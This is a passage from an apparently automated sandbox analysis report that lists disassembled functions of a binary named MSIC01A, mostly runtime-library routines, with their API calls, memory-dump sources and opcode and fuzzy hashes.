                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                        • String ID: false$true
                                                                                                                                                                        • API String ID: 3924972193-2658103896
                                                                                                                                                                        • Opcode ID: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                        • Instruction ID: 8097593466c97d7ecc3d4fe3eebd3df81133666125712f20d003a04083560838
                                                                                                                                                                        • Opcode Fuzzy Hash: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                        • Instruction Fuzzy Hash: 2D61B1B1D00348DBDB10DFA4C841BDEBBF4FF04714F14825AE945AB281E7B5AA48DB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4D3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D3D2
                                                                                                                                                                          • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                          • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F4D46E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                        • String ID: %.0Lf$0123456789-
                                                                                                                                                                        • API String ID: 2544715827-3094241602
                                                                                                                                                                        • Opcode ID: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                        • Instruction ID: 5c828320d91768ed27cd11f6602ce064b801a66da33e6000a09ea7e597a69e25
                                                                                                                                                                        • Opcode Fuzzy Hash: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                        • Instruction Fuzzy Hash: 01413A31900218DFCF15DFA8C880ADDBFB5BF08314F144159E905AB265DB74AA56EBA2
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4D66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F4D676
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                          • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F4D712
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789-$0123456789-
                                                                                                                                                                        • API String ID: 3042121994-2494171821
                                                                                                                                                                        • Opcode ID: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                        • Instruction ID: 6783ba5bf4f3ee914da54a4b3c103e6b63371ff609f9d493818ccd77d5ba45a9
                                                                                                                                                                        • Opcode Fuzzy Hash: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                        • Instruction Fuzzy Hash: 03415B71900218DFCF15EFA8CC80ADE7FB5BF08320F140159E915AB255DB34DA56EB92
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F5175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3_GS.LIBCMT ref: 00F51761
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                          • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                        • _Find_elem.LIBCPMT ref: 00F517FB
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                        • String ID: 0123456789-$0123456789-
                                                                                                                                                                        • API String ID: 3042121994-2494171821
                                                                                                                                                                        • Opcode ID: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                        • Instruction ID: cecde9125e7e3cfa0a36df8de3dc3db020ab7bbfd15ee8bb21767f96f719afc4
                                                                                                                                                                        • Opcode Fuzzy Hash: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                        • Instruction Fuzzy Hash: 20416031900209EFCF15DFA8D881A9EBBB5FF04311F10415AF911AB252DB78EA56EB91
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F48386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00F4838D
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C62
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C7F
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C9C
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CAE
                                                                                                                                                                          • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CC1
                                                                                                                                                                        • _Mpunct.LIBCPMT ref: 00F4841A
                                                                                                                                                                        • _Mpunct.LIBCPMT ref: 00F48434
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 2939335142-1686923651
                                                                                                                                                                        • Opcode ID: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                        • Instruction ID: f24b0a4dfc089d9566e4eca7936ad263c0d43bb3a44311fb9058e45d565ea81f
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                        • Instruction Fuzzy Hash: 7C21F1B1904B926ED725DF74C88073FBEF8BB08300F04455AE899C7A42E774E602DBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F4FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Mpunct$H_prolog3
                                                                                                                                                                        • String ID: $+xv
                                                                                                                                                                        • API String ID: 4281374311-1686923651
                                                                                                                                                                        • Opcode ID: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                        • Instruction ID: ac532c6f11010835a42350df73408fa4b64664fd3fdc90570d0618161d166cb7
                                                                                                                                                                        • Opcode Fuzzy Hash: 8934cd6abe708d8b655b3ef7acc631d6d46fa9bb854c90df332c502863164ade
                                                                                                                                                                        • Instruction Fuzzy Hash: F021C4B1904B916FD725DF74C89073BBEF8BB08301F04451AE999C7A42D774E605DB90
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F324C0 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32569
                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00F31434,?,00000000), ref: 00F32589
                                                                                                                                                                        • LocalFree.KERNEL32(?,00F31434,?,00000000), ref: 00F325DF
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,72A902E8,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434,?,00000000), ref: 00F32633
                                                                                                                                                                        • LocalFree.KERNEL32(?,72A902E8,?,00000000,00F73C40,000000FF,00000008,?,?,?,?,00F31434), ref: 00F32647
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Local$AllocFree$CloseHandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1291444452-0
                                                                                                                                                                        • Opcode ID: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                        • Instruction ID: 1bfaee2b16ca559256b916dcd73eb7b7666b362cd68129e9b42a9195b1353669
                                                                                                                                                                        • Opcode Fuzzy Hash: 41660260f6e16f608965e44b89eb4a02bbad5e3b65bfaf37cb75fb47b89ecb59
                                                                                                                                                                        • Instruction Fuzzy Hash: 81410C72604315DBC3549F38DC54B6ABBD8EF45370F14462AF526C72D1DB30DA44A761
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F71D9B Relevance: 6.3, APIs: 4, Instructions: 338fileCOMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetConsoleOutputCP.KERNEL32(72A902E8,?,00000000,?), ref: 00F71DFE
                                                                                                                                                                          • Part of subcall function 00F6A9BB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,00F66F5E,?,00000000,-00000008), ref: 00F6AA67
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00F72059
                                                                                                                                                                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00F720A1
                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F72144
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2112829910-0
                                                                                                                                                                        • Opcode ID: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                        • Instruction ID: 1ebd0443a59dd02368c1f56b2e39931c3434b3839a7dd53c979297beda20b427
                                                                                                                                                                        • Opcode Fuzzy Hash: dc52b70407b3530c503efbac714fa2aa5a1be0346276ab47c6e502d564d61190
                                                                                                                                                                        • Instruction Fuzzy Hash: 19D167B5E002489FCF15CFA8D880AEDBBB5FF09310F18856AE919EB351D730A945DB61
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F435F7 Relevance: 6.3, APIs: 4, Instructions: 282COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 838279627-0
                                                                                                                                                                        • Opcode ID: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                        • Instruction ID: 878013b9e121ccb323f48127e7629b30524b415d2c0d415a1d24df552a57af1c
                                                                                                                                                                        • Opcode Fuzzy Hash: 8de32893033c4aa8a30317422f35b14b25312b395a7fc743aad291e7e8de3ba6
                                                                                                                                                                        • Instruction Fuzzy Hash: 34B158B5D00259AFDF11DF98C880AEEBFB9FF48310F144019EC45AB255D734AA46EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3DA6F Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _strcspn$H_prolog3_ctype
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 838279627-0
                                                                                                                                                                        • Opcode ID: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                        • Instruction ID: d85d6e9940e51748d50853d228a541b4930e162b454601d8b36db6261378ef86
                                                                                                                                                                        • Opcode Fuzzy Hash: ebc73e0cb02c06783f44a6d4cff1fb7072313b76dd14fbe0f89d5ca4b4ee8d8b
                                                                                                                                                                        • Instruction Fuzzy Hash: 16B14971D002499FDF14DF98D981AEEBBB9FF48360F144019E805AB216D774AE46EBA0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F55A58 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AdjustPointer
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1740715915-0
                                                                                                                                                                        • Opcode ID: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                        • Instruction ID: 4e7a896a1eb56ec2a6f64ff6dd0d5bf53f600f637a7f772e8b8a34264af098ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 67e0a475e04ee23df7f3a4eae830039db8f0caf2b9c2e49d0d256c1c71dc5c63
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F510472A00B06AFDB298F14D865B7A77A4EF84B22F140529EE0187191E735EC88E790
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F624E8 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                        • Instruction ID: 5b60c134e48aa666d064ccd2316f3e4625f1690cb1f6a659a31ef2937f0a6bf8
                                                                                                                                                                        • Opcode Fuzzy Hash: d0883ba410d08fdd8a47573d11a26782b9cd9e748b109fd7b88bb52a84f4f53d
                                                                                                                                                                        • Instruction Fuzzy Hash: 8221DE32A04A06AF9B70AF64DCA1D6B77A8BF443707144525FD1697251EB31ED00B7A0
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F36FB0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00000002,80004005,S-1-5-18,00000008), ref: 00F36FB7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorLast
                                                                                                                                                                        • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                                                                                                                        • API String ID: 1452528299-1781106413
                                                                                                                                                                        • Opcode ID: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                        • Instruction ID: f8b8eea32ebf6cef2e6be5ee4157b2699c9c25ba081d3b1394509c518eb086a0
                                                                                                                                                                        • Opcode Fuzzy Hash: e4582b050b0be5e301728f9d8afe9e3999da51116443416b728b68f435d97325
                                                                                                                                                                        • Instruction Fuzzy Hash: 11218089E1032183CB342F38940137AB6E1EF54B64F64446FE8C8D7381FBA98C82A391
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 00F3CCE0 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,72A902E8), ref: 00F3CD1C
                                                                                                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD3C
                                                                                                                                                                        • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD6D
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 00F3CD86
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1461051265.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.1461036843.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461083562.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461103304.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.1461115945.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_f30000_MSIC01A.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CloseCreateHandlePointerWrite
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3604237281-0
                                                                                                                                                                        • Opcode ID: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
                                                                                                                                                                        • Instruction ID: ca00524f1b4480b7dca37352666c4e1355cbd74009fd05837f146745bb7a51dd
                                                                                                                                                                        • Opcode Fuzzy Hash: 1de43d87c10c7c047214c3987c5ac1e079799c57da2b548337e44d4427c0871d
